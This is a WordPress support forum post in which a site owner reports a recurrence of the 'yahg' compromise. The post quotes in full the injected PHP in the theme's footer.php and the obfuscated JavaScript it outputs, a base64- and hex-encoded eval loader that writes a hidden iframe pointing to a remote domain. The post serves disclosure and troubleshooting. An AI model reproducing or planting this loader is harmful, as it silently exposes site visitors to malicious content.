WordPress.org

Support

Support » Miscellaneous » yahg vunerability again

yahg vunerability again

  • lprent
    Participant

    @lprent

    The yagh bug referred to here just happened in my wordpress system running 2.5.1 in a different form. This previously happened on the previous 2.3.x system back in March exactly like the description in the link above.

    The server is running a FC6 fedora with apache and very limited server access. It modified the active theme’s footer.php.

    The generated output was :-

    </div> <!-- .content -->
    
    	<script>function
        EE28C5BB86B6E59028669F5CDC87F6F8(CF2908786055451B){return(parseInt(
        CF2908786055451B,16));}function E417D2B635CB5916ED753C59F6166C(
        DCCEDD4FB8B32634B73){function DE1B365014D0708B785C319(){var
        EE79D2C759494C6B00D1F4FDC747343=2;return EE79D2C759494C6B00D1F4FDC747343;}var
        E60247718C17F3D8F853817B5="";for(C9B1DAB222ED47955E124DB6F83A9=0;
        C9B1DAB222ED47955E124DB6F83A9<DCCEDD4FB8B32634B73.length;
        C9B1DAB222ED47955E124DB6F83A9+=DE1B365014D0708B785C319()){
        E60247718C17F3D8F853817B5+=( String.fromCharCode(
        EE28C5BB86B6E59028669F5CDC87F6F8(DCCEDD4FB8B32634B73.substr(
        C9B1DAB222ED47955E124DB6F83A9,DE1B365014D0708B785C319()))));}eval(
        E60247718C17F3D8F853817B5);}E417D2B635CB5916ED753C59F6166C("
        646F63756D656E742E777269746528223C696672616D65207372633D687474703A2F2F6773746174732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E22293B
        ");</script>
    	<div class
        ="clear"></div>
    </div> <!-- Close
    Page -->

    It attached itself to the top of the K2 theme footer.php.

    <?php
    if (!isset($_COOKIE["yahg"])) echo base64_decode('PHNjcmlwdD5mdW5jdGlvbiBFRTI4QzVCQjg2QjZFNTkwMjg2NjlGNUNEQzg3RjZGOChDRjI5MDg3ODYwNTU0NTFCKXtyZXR1cm4ocGFyc2VJbnQoQ0YyOTA4Nzg2MDU1NDUxQiwxNikpO31mdW5jdGlvbiBFNDE3RDJCNjM1Q0I1OTE2RUQ3NTNDNTlGNjE2NkMoRENDRURENEZCOEIzMjYzNEI3Myl7ZnVuY3Rpb24gREUxQjM2NTAxNEQwNzA4Qjc4NUMzMTkoKXt2YXIgRUU3OUQyQzc1OTQ5NEM2QjAwRDFGNEZEQzc0NzM0Mz0yO3JldHVybiBFRTc5RDJDNzU5NDk0QzZCMDBEMUY0RkRDNzQ3MzQzO312YXIgRTYwMjQ3NzE4QzE3RjNEOEY4NTM4MTdCNT0iIjtmb3IoQzlCMURBQjIyMkVENDc5NTVFMTI0REI2RjgzQTk9MDtDOUIxREFCMjIyRUQ0Nzk1NUUxMjREQjZGODNBOTxEQ0NFREQ0RkI4QjMyNjM0QjczLmxlbmd0aDtDOUIxREFCMjIyRUQ0Nzk1NUUxMjREQjZGODNBOSs9REUxQjM2NTAxNEQwNzA4Qjc4NUMzMTkoKSl7RTYwMjQ3NzE4QzE3RjNEOEY4NTM4MTdCNSs9KCBTdHJpbmcuZnJvbUNoYXJDb2RlKEVFMjhDNUJCODZCNkU1OTAyODY2OUY1Q0RDODdGNkY4KERDQ0VERDRGQjhCMzI2MzRCNzMuc3Vic3RyKEM5QjFEQUIyMjJFRDQ3OTU1RTEyNERCNkY4M0E5LERFMUIzNjUwMTREMDcwOEI3ODVDMzE5KCkpKSkpO31ldmFsKEU2MDI0NzcxOEMxN0YzRDhGODUzODE3QjUpO31FNDE3RDJCNjM1Q0I1OTE2RUQ3NTNDNTlGNjE2NkMoIjY0NkY2Mzc1NkQ2NTZFNzQyRTc3NzI2OTc0NjUyODIyM0M2OTY2NzI2MTZENjUyMDczNzI2MzNENjg3NDc0NzAzQTJGMkY2NzczNzQ2MTc0NzMyRTYzNkUyMDczNzQ3OTZDNjUzRDY0Njk3MzcwNkM2MTc5M0E2RTZGNkU2NTNFM0MyRjY5NjY3MjYxNkQ2NTNFMjIyOTNCIik7PC9zY3JpcHQ+');
     /* K2 Hook */ do_action('template_after_content'); ?>
    
    	<div class="clear"></div>
    </div> <!-- Close Page -->

    I have no idea how it modified the file. The date/time were the same as the offsite copy. Nothing else in the system was affected, so I’d guess that it was wordpress vunerability. Just bringing it to your attention.

  • The topic ‘yahg vunerability again’ is closed to new replies.